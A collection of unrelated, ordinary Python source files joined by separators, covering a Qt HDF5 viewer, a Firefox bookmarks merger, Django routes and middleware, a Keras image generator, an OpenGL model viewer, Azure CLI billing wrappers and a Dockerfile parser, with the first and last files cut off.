self._ipykernel.add_to_namespace('app', self)
self._ipykernel.add_to_namespace('view', self._view)
self._ipykernel.add_to_namespace('model', self._model)
self._ipykernel.add_to_namespace('plot', self._plotArea)
"""Namespaces added to the kernel are visible in the consoles"""
self._initConsoleMenu()
"""Add console menu"""
else:
self._ipykernel = None
if self._ipykernel is not None:
self._ipykernel.new_qt_console()
"""Open one console"""
self._plotArea.addPlotWindow()
"""Add one plot window"""
def showEvent(self, event):
self.loadSettings()
super(MainWindowHdf5Tree, self).showEvent(event)
def closeEvent(self, event):
self.saveSettings()
super(MainWindowHdf5Tree, self).closeEvent(event)
def loadSettings(self):
"""TODO"""
pass
def saveSettings(self):
"""TODO"""
pass
# Populate the menu bar with common actions and shortcuts
def _addMenuAction(self, menu, action, deferShortcut=False):
"""Add action to menu as well as self so that when the menu bar is
invisible, its actions are still available. If deferShortcut
is True, set the shortcut context to widget-only, where it
will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if deferShortcut:
action.setShortcutContext(qt.Qt.WidgetShortcut)
else:
action.setShortcutContext(qt.Qt.ApplicationShortcut)
def _initAppMenu(self):
"""Add application menu"""
self._menuApp = self._menuBar.addMenu("Application")
self._closeAppAction = qt.QAction("&Quit", self, shortcut="Ctrl+Q",
triggered=self.onClose)
self._addMenuAction(self._menuApp, self._closeAppAction)
def _initConsoleMenu(self):
self._menuConsole = self._menuBar.addMenu("Console")
self._newConsoleAction = qt.QAction("&New Qt Console",
self, shortcut="Ctrl+K",
triggered=self._ipykernel.new_qt_console)
self._addMenuAction(self._menuConsole, self._newConsoleAction)
def onClose(self):
if self._ipykernel is not None:
self._ipykernel.cleanup_consoles()
self.closeEvent(quit())
|
"""Extract and merge links from HTML bookmarks files exported from Firefox.
A Firefox bookmarks file doesn't make bookmarks available in a form that's easy to work with.
This tool solves that problem.
"""
import json
import sys
from bs4 import BeautifulSoup
import click
def firefox_link(address, name, attrs):
return {
'address': address,
'name': name,
'attrs': attrs
}
def bookmark_folder(folder_name, bookmarks):
return {
'folder_name': folder_name,
'bookmarks': bookmarks
}
def bookmarks_to_html(bookmarks):
header = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks Menu</H1>
<dl><p>"""
contents = [bookmark_to_html(bookmark) for bookmark in bookmarks]
footer = "</dl>"
return '\n'.join([header] + contents + [footer])
def bookmark_to_html(bookmark):
if 'address' in bookmark:
return firefox_link_to_html(bookmark)
elif 'bookmarks' in bookmark:
return bookmark_folder_to_html(bookmark)
raise ValueError('Unhandled bookmark type')
def firefox_link_to_html(link):
tags = " ".join(
[f'href="{link["address"]}"'] +
[f'{attr}="{value}"' for attr, value in link['attrs'].items()]
)
return f'<dt><a {tags}>{link["name"]}</a>'
def bookmark_folder_to_html(folder):
# TODO the header also has ADD_DATE, LAST_MODIFIED, but I don't care much about those things.
header = f'<dt><h3>{folder["folder_name"]}</h3>'
start = '<dl><p>'
contents = [bookmark_to_html(bookmark) for bookmark in folder['bookmarks']]
end = '</dl><p>'
return '\n'.join([header, start] + contents + [end])
def parse_bookmarks(root):
"""Parse the tree of bookmarks from an HTML bookmark file exported from Firefox.
The doctype of this file claims to be "NETSCAPE-Bookmark-file-1".
"""
bookmarks = []
for e in root.find_all('dt', recursive=False):
for link in e.find_all('a', recursive=False):
bookmarks.append(firefox_link(
link.get('href'),
link.string,
{attr: link.get(attr) for attr in link.attrs if attr != 'href'},
))
for folder in e.find_all('h3', recursive=False):
folder_name = folder.string
folder_dl = folder.find_next_sibling('dl')
bookmarks.append(bookmark_folder(
folder_name,
parse_bookmarks(folder_dl)
))
return bookmarks
def parse_bookmarks_from_html(filename):
with open(filename) as f:
soup = BeautifulSoup(f, 'html5lib')
return parse_bookmarks(soup.find('dl'))
def bookmark_addresses(bookmarks):
"""Generate addresses from a parsed tree of bookmarks."""
# A bookmark is either a firefox_link or a bookmark_folder
for bookmark in bookmarks:
if 'address' in bookmark:
yield bookmark['address']
elif 'bookmarks' in bookmark:
yield from bookmark_addresses(bookmark['bookmarks'])
def remove_duplicate_bookmarks(bookmarks, addresses):
"""Remove duplicate addresses from a tree of bookmarks."""
out_bookmarks = []
for bookmark in bookmarks:
if 'address' in bookmark:
if bookmark['address'] in addresses:
print(f'Dupe: {bookmark["address"]}', file=sys.stderr)
elif bookmark['address'].startswith('place:'):
# Skip recents and other autogenerated bookmark lists
continue
else:
out_bookmarks.append(bookmark)
elif 'bookmarks' in bookmark:
deduped = remove_duplicate_bookmarks(bookmark['bookmarks'], addresses)
if deduped:
out_bookmarks.append(bookmark_folder(bookmark['folder_name'], deduped))
return out_bookmarks
@click.group(help=__doc__)
def cli():
pass
@cli.command('extract')
@click.argument('bookmarks_filename')
def click_extract(bookmarks_filename):
"""Extract bookmarks in a bookmarks HTML file to structured JSON."""
print(json.dumps(parse_bookmarks_from_html(bookmarks_filename), indent=4))
@cli.command('prepare-import')
@click.argument('primary_bookmarks_filename')
@click.argument('secondary_bookmarks_filename')
def click_merge(primary_bookmarks_filename, secondary_bookmarks_filename):
"""Prepare secondary bookmarks for import.
Given an HTML bookmarks export from the primary Firefox profile and an HTML bookmarks export
from the secondary Firefox profile, write an HTML file containing bookmarks that appear only in
the secondary profile.
The bookmark folder structure from the secondary file is preserved in a new folder with the
following deduplication operations performed:
- If a bookmark's address also appears in the primary file, it is omitted from the secondary.
- If omissions of bookmarks result in empty folders, the empty folders are pruned.
A new bookmarks file is written out, which can then be imported into the primary Firefox
profile via the Bookmarks Manager. The user can then use the Bookmarks Manager to manipulate
the secondary's folder structure, merging it with the primary with the assurance that doing so
won't result in adding duplicate bookmarks.
"""
primary_bookmarks = parse_bookmarks_from_html(primary_bookmarks_filename)
primary_addresses = set(bookmark_addresses(primary_bookmarks))
secondary_bookmarks = parse_bookmarks_from_html(secondary_bookmarks_filename)
deduplicated_secondary_bookmarks = remove_duplicate_bookmarks(
secondary_bookmarks, primary_addresses)
print(bookmarks_to_html(deduplicated_secondary_bookmarks))
if __name__ == '__main__':
cli()
|
"""Registering translated models for the ``cmsplugin_blog_seo_addons`` app."""
from simple_translation.translation_pool import translation_pool
from .models import SEOAddon, SEOAddonTranslation
translation_pool.register_translation(SEOAddon, SEOAddonTranslation)
|
#!/usr/bin/env python3
# This file turns the file name that we read into obsidian URL by combining it with the url scheme provided by obsidian
vaultURL = "obsidian://open?vault=Knowledge%20Base&file=52%20-%20Memory%20Base%2F"
def generate(title):
title = encode(title)
title = vaultURL + title
return title
def encode(string):
string = str(string.encode("utf-8"))
string = string.replace("\\x", "%")
string = string.replace(" ", "%20")
string = string.replace("/", "%2F")
string = string.lstrip("\'b")
string = string.rstrip("\'")
string = capitalize_unicode(string)
return string
def capitalize_unicode(string):
new = []
position = -5
for index in range(0, len(string)):
if string[index] == "%":
position = index
new.append(string[index])
elif index == position + 1 or index == position + 2:
new.append(string[index].capitalize())
else:
new.append(string[index])
return "".join(new)
|
from apps.core.errors import ProblemDetailException, ValidationException
from apps.api.response import ErrorResponse, ValidationResponse
class ExceptionMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
return self.get_response(request)
@staticmethod
def process_exception(request, exception):
if isinstance(exception, ProblemDetailException):
return ErrorResponse.create_from_exception(exception)
if isinstance(exception, ValidationException):
return ValidationResponse.create_from_exception(exception)
__all__ = [
'ExceptionMiddleware'
]
|
################################################################################################################################
# *** Copyright Notice ***
#
# "Price Based Local Power Distribution Management System (Local Power Distribution Manager) v1.0"
# Copyright (c) 2016, The Regents of the University of California, through Lawrence Berkeley National Laboratory
# (subject to receipt of any required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# If you have questions about your rights to use or distribute this software, please contact
# Berkeley Lab's Innovation & Partnerships Office at IPO@lbl.gov.
################################################################################################################################
"""
Implementation of a PWM and beaglebone based EUD device.
"""
import os
with open("/tmp/LPDM_light_pythonpath", "a") as f:
f.write("{p}\n".format(p=os.environ["PYTHONPATH"].split(os.pathsep)))
#from eud import Eud
from device.simulated.eud import Eud
from philips_lights.light_driver import Light_Driver
from common.smap_tools.smap_tools import download_most_recent_point
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import json
class Philips_Light(Eud):
def __init__(self, config = None):
self._device_type = "philips_light"
# Call super constructor
Eud.__init__(self, config)
self._smap_info = config.get("smap", None)
self._current_light_level = None
self.light_server_info = config.get("light_server")
url = self.light_server_info.get("url")
username = self.light_server_info.get("user")
pw = self.light_server_info.get("password")
self.driver = Light_Driver(url, (username, pw))
def on_price_change(self, source_device_id, target_device_id, time, new_price):
# just doing 1-price to get light level. Light level should be between 0 and 1
# and prices are currently between 0 and 1 so this works for the experiment
# but will need to be changed if/when the range values price can take changes.
self.set_light_level(1.0 - new_price)
# return flow to the rest of the LPDM stack
super(Philips_Light, self).on_price_change(source_device_id, target_device_id, time, new_price)
def lookup_power(self):
if self._smap_info:
stream_info = self._smap_info.get("power", None)
if stream_info:
_, ts, value = download_most_recent_point(stream_info["smap_root"], stream_info["stream"])
return value
def on_time_change(self, new_time):
power_use = self.lookup_power()
self.broadcast_new_power(power_use)
super(Philips_Light, self).on_time_change(new_time)
def set_light_level(self, light_level):
res = self.driver.set_light_level(light_level)
return res
|
import hashlib
import os
def read_in_chunks(file_object, chunk_size=1024):
while True:
data = file_object.read(chunk_size)
if not data:
break
yield data
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def hash_bytestr_iter(bytesiter, hasher):
for block in bytesiter:
hasher.update(block)
return hasher.hexdigest()
def file_as_blockiter(afile, blocksize=65536):
with afile:
block = afile.read(blocksize)
while len(block) > 0:
yield block
block = afile.read(blocksize)
def sha256(path):
block_iter = file_as_blockiter(open(path, "rb"))
hasher = hashlib.sha256()
return hash_bytestr_iter(block_iter, hasher)
class File(object):
def __init__(self, path):
if path and not os.path.exists(path):
touch(path)
self.path = path
def open(self, mode="r"):
return open(self.path, mode)
def __len__(self):
return os.stat(self.path).st_size
def __iadd__(self, other):
with open(self.path, "ab") as us:
with open(other.path, "rb") as them:
for chunk in read_in_chunks(them, 2 ** 16):
us.write(chunk)
return self
def sha256(self):
return sha256(self.path)
def __eq__(self, other):
if self is other:
return True
return self.sha256() == other.sha256()
|
numero = int(input("Por favor, entre com o número de segundos que deseja converter: "))
dias = numero // (3600*24)
numero = numero % (3600*24)
horas = numero // 3600
numero = numero % 3600
minutos = numero // 60
numero = numero % 60
print(dias,"dias,",horas, "horas,",minutos, "minutos e",numero, "segundos.")
|
from django.conf.urls import patterns, include, url
from pull.views import *
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'pull.views.home', name='home'),
# url(r'^pull/', include('pull.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^$', NewsListView.as_view()),
url(r'^new/(\d+)/$', NewsSubject),
url(r'^class/(?P<id>\d+)/$', ClassShow.as_view()),
url(r'^admin/', include(admin.site.urls)),
url(r'^p/(?P<path>.*)$', proxy_to),
#url(r'^task/(?P<id>\d+)$', task_to),
url(r'^like/(?P<path>.*)$', like_models),
url(r'^search/(?P<path>.*)$', search_content),
url(r'^dup$', DupListView.as_view()),
url(r'^pic/(?P<path>.*)$', search_pic),
url(r'^test$', test_page),
)
|
from .seq2seq import RNNSeq2Seq
|
import os, cv2
import numpy as np
import tensorflow as tf
from sklearn import preprocessing
class Generator(tf.keras.utils.Sequence):
"""
This is the data generator class that defines the data generator objects that will be used in training and testing the model.
The purpose of the generator is to give the images in batches, rather than loading them all into batches.
All of the methods are made to initialize data or return data through the __getitem__ method, which is the Keras sequence
method for generating batches.
"""
#DATASET_PATH is the training directory or the testing directory, not the directory that contains both
def __init__(self, DATASET_PATH, BATCH_SIZE = 2, image_min_side = 50):
#size of the batches that will be generated
self.batch_size = BATCH_SIZE
#if the image's smalles side is smaller than this, it will be enarged while keeping it's aspect ratio
self.image_min_side = image_min_side
#saving image paths and labels during initialization
ABSOLUTE_DATASET_PATH = os.path.join(os.path.dirname(__file__), '..', '..', DATASET_PATH)
print(f'The Absolute Dataset Path is: {ABSOLUTE_DATASET_PATH}')
self.load_image_paths_and_labels(ABSOLUTE_DATASET_PATH)
self.create_image_groups()
def load_image_paths_and_labels(self, ABSOLUTE_DATASET_PATH):
"""
This is used to load a list of image paths and a list of their labels.
This information will be saved to the object during initialization.
"""
#list of paths of class directories within image directory
classes = os.listdir(ABSOLUTE_DATASET_PATH)
#creating lists for image paths and label
self.image_paths = []
self.image_labels = []
#iterating through each class
for class_name in classes:
if class_name == 'popular':
label = 1
if class_name == 'not_popular':
label = 0
if class_name == 'medium':
label = 0.5
if class_name == 'low_medium':
label = 0.25
if class_name == 'high_medium':
label = 0.75
#path for the current class
class_path = os.path.join(ABSOLUTE_DATASET_PATH, class_name)
#iterating through each image in the class
for image_file_name in os.listdir(class_path):
#adding the image path
self.image_paths.append(os.path.join(class_path, image_file_name))
#adding the image label
self.image_labels.append(label)
#transforming all the labels into numbers
self.image_labels = np.array(self.image_labels, dtype='float32')
#check that the image_paths and image_labels are the same, which is necessary becuase each label corresponds with an image
assert len(self.image_paths) == len(self.image_labels)
def create_image_groups(self):
"""
This is used to load the image paths and labels into groups.
This information will be saved to the model during initialization.
"""
#shuffle the images
seed = 4321
np.random.seed(seed)
np.random.shuffle(self.image_paths)
np.random.seed(seed)
np.random.shuffle(self.image_labels)
#Divide image_labels and image_paths, based on BATCH_SIZE
self.image_groups = [[self.image_paths[x % len(self.image_paths)] for x in range(i, i + self.batch_size)] for i in range(0, len(self.image_paths), self.batch_size)]
self.label_groups = [[self.image_labels[x % len(self.image_labels)] for x in range(i, i + self.batch_size)] for i in range(0, len(self.image_labels), self.batch_size)]
def resize_image(self, image):
"""
This method ensures that each image's smallest side is greater than image_min_side.
It should be noted that this method works with actual images, not image paths
"""
#getting information about the image
height, width, color = image.shape
smallest = self.image_min_side
#creating a number to multiply both sides by, ensuring that the images smallest side is as large as image_min_side while maintaining image aspect ratio
if min(height, width) < self.image_min_side:
multiplier = float(smallest)/height if height < width else float(smallest)/width
else:
multiplier = 1
#multiplying dimensions by multiplier to get new dimensions
new_height = int(height*multiplier)
new_width = int(width*multiplier)
#resizing image
#for some reason, cv2.resize() expects the tuple to be (width, height)
new_image = cv2.resize(image, (new_width, new_height), interpolation=cv2.INTER_AREA)
return new_image
def load_images(self, image_group):
"""
This method uses image paths to load images, and ensures that they meet the requirement of image_min_side.
It also makes the color channel RGB, instead of GRAY, BGRA, or BGR
"""
#initializing list of images in image_group
images = []
#iterating through each image
for image_path in image_group:
#loading image through image path
image = cv2.imread(image_path)
#using the length of the image shape to find out what type of color channel it uses
image_shape = len(image.shape)
#convering to RGB
if image_shape == 2:
image = cv2.cvtColor(image,cv2.COLOR_GRAY2RGB)
elif image_shape == 4:
image = cv2.cvtColor(image,cv2.COLOR_BGRA2RGB)
elif image_shape == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
#ensuring image meets image_min_side requirement
transformed_image = self.resize_image(image)
images.append(transformed_image)
return images
def construct_image_batch(self, loaded_image_group):
"""
This method uses the loaded image_group from load images to create an image batch.
This is also where images that are smaller than the largest image will have zeros added to fit the model.
"""
#get the shape of the largest image
largest_shape = tuple(max(image.shape[x] for image in loaded_image_group) for x in range(3))
#create an image batch object, with each image being an empty set of pixels the size of the largest image
image_batch = np.zeros((self.batch_size,) + largest_shape, dtype='float32')
#iterate through image_group, using enumerate to access both the image and the index of the image, i.e., (4, '4th_image')
for index, image in enumerate(loaded_image_group):
"""
Filling the image in the batch from the upper left part of image, replacing the empty pixels with pixels from the
actual image. The model will learn to ignore the extra empty space.
"""
image_batch[index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
return image_batch
def __len__(self):
"""
The number of batches in the generator.
This will be called for the len() function
"""
return len(self.image_groups)
def __getitem__(self, index):
"""
This is the Keras sequence method for generating batches, all of the code builds up to this point
"""
#getting 1 group of images and it's labels
image_group = self.image_groups[index]
label_group = self.label_groups[index]
#converting the image group (image paths) into images
loaded_images = self.load_images(image_group)
#creating the image batch and aerating the images
image_batch = self.construct_image_batch(loaded_images)
#The culmination of all the work put into this file!
return np.array(image_batch), np.array(label_group)
|
r"""General utilities for Hypothesis."""
import hypothesis
import numpy as np
import torch
def is_iterable(item):
return hasattr(item, "__getitem__")
|
"""This submodule serves the purpose of preparing the frames
for further processing.
"""
import os
from .process import DSLRImage, Color, ImageType, isRaw
from .calibrate import calibrate
import numpy as np
__all__ = ["sort"]
def __listdir(path):
# optimizes the os.listdir function
return [
path + '/' + d for d in os.listdir(path)
if os.path.isfile(path + '/' + d)
]
def __listraw(path):
return [f for f in __listdir(path) if isRaw(f)]
def sort(path, red=False, green=True, blue=False, binX=None, binY=None):
"""Initializes DSLRImage classes for each frame,
then bins them and stores specified monochrome images to FITS.
"""
if binY is None:
binY = binX
lights = [
DSLRImage(f, itype=ImageType.LIGHT)
for f in __listraw(path + "/Light_frames")
]
bias = [
DSLRImage(f, itype=ImageType.BIAS)
for f in __listraw(path + "/Bias_frames")
]
darks = [
DSLRImage(f, itype=ImageType.DARK)
for f in __listraw(path + "/Dark_frames")
]
flats = [
DSLRImage(f, itype=ImageType.FLAT)
for f in __listraw(path + "/Flat_fields")
]
imagesR = np.empty(())
imagesG = np.empty(())
imagesB = np.empty(())
if(red):
clights = np.array([im.extractChannel(Color.RED) for im in lights])
cbias = np.array([im.extractChannel(Color.RED) for im in bias])
cflats = np.array([im.extractChannel(Color.RED) for im in flats])
cdarks = np.array([im.extractChannel(Color.RED) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesR = clights
if(green):
clights = np.array([im.extractChannel(Color.GREEN) for im in lights])
cbias = np.array([im.extractChannel(Color.GREEN) for im in bias])
cflats = np.array([im.extractChannel(Color.GREEN) for im in flats])
cdarks = np.array([im.extractChannel(Color.GREEN) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesG = clights
if(blue):
clights = np.array([im.extractChannel(Color.BLUE) for im in lights])
cbias = np.array([im.extractChannel(Color.BLUE) for im in bias])
cflats = np.array([im.extractChannel(Color.BLUE) for im in flats])
cdarks = np.array([im.extractChannel(Color.BLUE) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesB = clights
for im in np.concatenate((imagesR, imagesG, imagesB)):
im.binImage(binX, binY)
return (imagesR, imagesG, imagesB)
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use, line-too-long
"""Tests using pytest_resilient_circuits"""
from __future__ import print_function
import pytest
from fn_cve_search.util.selftest import selftest_function
class TestCVESearch:
opts = {
"fn_cve_search": {
"max_results_display": 50,
"cve_base_url": "https://cve.circl.lu/api"
}
}
@pytest.mark.livetest
def test_cs_device_id_not_defined(self):
result = selftest_function(TestCVESearch.opts)
assert (result['state'] == "Success")
|
import argparse
import math
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
width = 500
height = 500
viewpoint = []
H = 0
scale = 2
points = []
polygons = []
window: GLint
def center_and_scale_model():
x = [point[0].value for point in points]
y = [point[1].value for point in points]
z = [point[2].value for point in points]
maxx = max(x)
minx = min(x)
maxy = max(y)
miny = min(y)
maxz = max(z)
minz = min(z)
div = max([maxx - minx, maxy - miny, maxz - minz])
for point in points:
point[0] = GLfloat(((point[0].value - (minx + maxx)/2)) * (scale/div))
point[1] = GLfloat(((point[1].value - (miny + maxy)/2)) * (scale/div))
point[2] = GLfloat(((point[2].value - (minz + maxz)/2)) * (scale/div))
def multiply_array_of_matrices(matrices):
result = matrices[0]
for i in range(1, len(matrices)):
X = result
Y = matrices[i]
result = [[sum(a*b for a,b in zip(X_row,Y_col)) for Y_col in zip(*Y)] for X_row in X]
return result
def get_transformation_matrix():
global points
global H
model_center = [0 - viewpoint[0], 0 - viewpoint[1], 0 - viewpoint[2]]
t1 = [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [model_center[0], model_center[1], model_center[2], 1]]
sinalpha = model_center[1] / (math.sqrt(model_center[0] ** 2 + model_center[1] ** 2))
cosalpha = model_center[0] / (math.sqrt(model_center[0] ** 2 + model_center[1] ** 2))
model_center = [math.sqrt(model_center[0] ** 2 + model_center[1] ** 2), 0, model_center[2]]
t2 = [[cosalpha, -sinalpha, 0, 0], [sinalpha, cosalpha, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
sinbeta = model_center[0] / (math.sqrt(model_center[0] ** 2 + model_center[2] ** 2))
cosbeta = model_center[2] / (math.sqrt(model_center[0] ** 2 + model_center[2] ** 2))
model_center = [0, 0, math.sqrt(model_center[0] ** 2 + model_center[2] ** 2)]
t3 = [[cosbeta, 0, sinbeta, 0], [0, 1, 0, 0], [-sinbeta, 0, cosbeta, 0], [0, 0, 0, 1]]
H = model_center[2]
t4 = [[0, -1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
t5 = [[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
return multiply_array_of_matrices([t1, t2, t3, t4, t5])
def myReshape(width, height):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glClearColor(1.0, 1.0, 1.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
glPointSize(1.0)
glColor3f(0.0, 0.0, 0.0)
def myDisplay():
center_and_scale_model()
transform_matrix = get_transformation_matrix()
transformed_points = []
#Transforming points
for i in range(len(points)):
transformed_point = [part.value for part in points[i]]
transformed_point.append(1.0)
transformed_point = multiply_array_of_matrices([[transformed_point], transform_matrix])[0]
draw_point = [transformed_point[0]/transformed_point[2] * H, transformed_point[1]/transformed_point[2] * H]
draw_point = [GLfloat(part) for part in draw_point]
transformed_points.append(draw_point)
#Drawing points
for polygon in polygons:
glBegin(GL_LINE_LOOP)
glVertex2f(transformed_points[polygon[0]][0], transformed_points[polygon[0]][1])
glVertex2f(transformed_points[polygon[1]][0], transformed_points[polygon[1]][1])
glVertex2f(transformed_points[polygon[2]][0], transformed_points[polygon[2]][1])
glEnd()
glFlush()
def parse_args():
parser = argparse.ArgumentParser(description='Draws 3d model from object file')
parser.add_argument('object_file', help='path to object file')
parser.add_argument('viewpoint', help='viewpoint (x, y, z)')
args = parser.parse_args()
return args
def read_file(object_file):
global points, polygons
with open(object_file, 'r') as inp:
for line in inp:
if line.startswith('v'):
line = line.strip().split(' ')
points.append([GLfloat(float(line[1])), GLfloat(float(line[2])), GLfloat(float(line[3]))])
elif line.startswith('f'):
line = line.strip().split(' ')
polygons.append([int(line[1]) - 1, int(line[2]) - 1, int(line[3]) - 1])
def check_point(point):
x = point[0]
y = point[1]
z = point[2]
for polygon in polygons:
x1 = points[polygon[0]][0].value
x2 = points[polygon[1]][0].value
x3 = points[polygon[2]][0].value
y1 = points[polygon[0]][1].value
y2 = points[polygon[1]][1].value
y3 = points[polygon[2]][1].value
z1 = points[polygon[0]][2].value
z2 = points[polygon[1]][2].value
z3 = points[polygon[2]][2].value
A = (y2 - y1) * (z3 - z1) - (z2 - z1) * (y3 - y1)
B = -1 * (x2 - x1) * (z3 - z1) + (z2 - z1) * (x3 - x1)
C = (x2 - x1) * (y3 - y1) - (y2 - y1) * (x3 - x1)
D = -1 * x1 * A - y1 * B - z1 * C
VR = A*x + B*y + C*z + D
if VR >= 0:
return False
return True
def myKeyboard(theKey, mouseX, mouseY):
global viewpoint, scale
theKey = theKey.decode().lower()
if theKey == 'w':
viewpoint[1] += .1
elif theKey == 's':
viewpoint[1] -= .1
elif theKey == 'd':
viewpoint[0] += .1
elif theKey == 'a':
viewpoint[0] -= .1
elif theKey == 'g':
viewpoint[2] += .1
elif theKey == 'f':
viewpoint[2] -= .1
elif theKey == '+':
scale += .1
elif theKey == '-':
if scale > .1:
scale -= .1
else:
return
print('New viewpoint is:')
print(viewpoint)
myReshape(width, height)
myDisplay()
def main():
global window, viewpoint
args = parse_args()
read_file(args.object_file)
viewpoint = list(eval(args.viewpoint))
while check_point(viewpoint):
print('Viewpoint is inside model, choose another one')
viewpoint = list(eval(input('Viewpoint (x, y, z): ')))
print("Observation point is calculated as the center of the model (0, 0, 0 since model will be centered)")
print('Use "a" to decrease viewpoint x value and "d" to increase x value')
print('Use "s" to decrease viewpoint y value and "w" to increase y value')
print('Use "f" to decrease viewpoint z value and "g" to increase z value')
print('Use "-" to zoom out and "+" to zoom in')
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(width, height)
glutInitWindowPosition(100, 100)
glutCreateWindow("Glut OpenGL 3d object")
glutReshapeFunc(myReshape)
glutKeyboardFunc(myKeyboard)
glutDisplayFunc(myDisplay)
glutMainLoop()
if __name__ == "__main__":
main()
|
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def list(period_start_date, period_end_date, account_name=None, profile_name=None):
params = get_params(locals())
command = "az billing invoice list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(name, account_name=None, by_subscription=None):
params = get_params(locals())
command = "az billing invoice show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def download(account_name=None, invoice_name=None, download_token=None, download_urls=None):
params = get_params(locals())
command = "az billing invoice download " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
-----------------File Info-----------------------
Name: function.py
Description: save code that frequently used
Author: GentleCP
Email: 574881148@qq.com
WebSite: https://www.gentlecp.com
Create Date: 3/24/2021
-----------------End-----------------------------
"""
from math import ceil
def is_unique(seq):
'''
judge whether a giving sequence has repeating elements or not
Args:
seq: sequence like list, tuple and so on.
Returns: True if unique and False if not unique
'''
return len(seq) == len(set(seq))
def chunk_list(lst: list, size: int):
'''
split a list into num chunks by specifying the chunk size
e.g. [1,2,3,4,5] -> [[1,2], [3,4], [5]]
Args:
lst: [1,2,3,4,5]
size: 3
Returns: chunk_list, e.g. [[1,2], [3,4], [5]]
'''
return map(lambda x: lst[x * size: x * size + size], list(range(0, ceil(len(lst) / size))))
def flatten_seq(seq):
'''
flatten a deep sequence into a single one
e.g. [[1,2],[[3,4]],5] -> [1,2,3,4,5]
Args:
seq: sequence, could be list or tuple...
Returns:
'''
for item in seq:
try:
for subitem in flatten_seq(item):
yield subitem
except TypeError:
yield item
|
import logging
import os
from dockermake.dockerfile.instructions import Keywords
from dockermake.dockerfile.instructions import InstructionFactory
from dockermake.lint.linter import DockerfileLint
from dockermake.dockerfile.logical_line_extractor import LogicalLineExtractor
class Dockerfile:
def __init__(self):
self.path = None
self.physical_lines = list()
self.logical_lines = list()
self.instructions = list()
self.stages = list()
@staticmethod
def load(working_directory_path, dockerfile_name):
dockerfile_path = os.path.join(working_directory_path, dockerfile_name)
return Dockerfile.load_from_file_path(dockerfile_path)
@staticmethod
def load_from_file_path(dockerfile_path):
if not os.path.isfile(dockerfile_path):
raise Exception("Dockerfile not found at %s" % dockerfile_path)
with open(dockerfile_path, 'r', encoding='UTF-8') as dockerfile:
context = dockerfile.read()
logging.debug("Read dockerfile from: %s", dockerfile_path)
dockerfile = Dockerfile._parse(context)
dockerfile.path = dockerfile_path
return dockerfile
@staticmethod
def _parse(context):
dockerfile = Dockerfile()
dockerfile.physical_lines = context.splitlines()
dockerfile.logical_lines = LogicalLineExtractor.parse_dockerfile(context)
dockerfile.instructions = Dockerfile._create_instructions_from_logical_lines(dockerfile.logical_lines)
dockerfile.stages = Dockerfile._set_stage_names_from_instructions(dockerfile.instructions)
logging.debug("Dockerfile instructions successfully parsed: %s", dockerfile.instructions)
return dockerfile
@staticmethod
def _create_instructions_from_logical_lines(logical_lines):
instructions = list()
for logical_line, according_physical_line in logical_lines:
keyword, argument = logical_line.split(' ', 1)
if keyword in Keywords.list:
instruction = InstructionFactory.create_from_keyword(
keyword, argument, according_physical_line
)
instructions.append(instruction)
else:
raise Exception("Unknown instruction in Dockerfile: %s" % keyword)
return instructions
@staticmethod
def _set_stage_names_from_instructions(instructions):
stages = list()
stage_index = -1
stage = None
for instruction in instructions:
if instruction.get_type() == Keywords.FROM:
stage_index += 1
if instruction.stage_name:
stage = instruction.stage_name
else:
stage = stage_index
stages.append(stage)
elif stage is None:
logging.debug("Dockerfile did not start with a FROM instruction, stage -1 exists")
stage = stage_index
stages.append(stage_index)
instruction.stage = stage
return stages
def lint(self, exit_on_errors, exclude):
DockerfileLint(self, exit_on_errors, exclude).lint()
def get_physical_lines(self):
return self.physical_lines
def get_last_stage(self):
return self.stages[-1]
def get_instructions(self, stage=None):
instructions = list()
for instruction in self.instructions:
if stage is None or instruction.stage == stage:
instructions.append(instruction)
return instructions
def get_instructions_of_type(self, instruction_type, stage=None):
instructions = list()
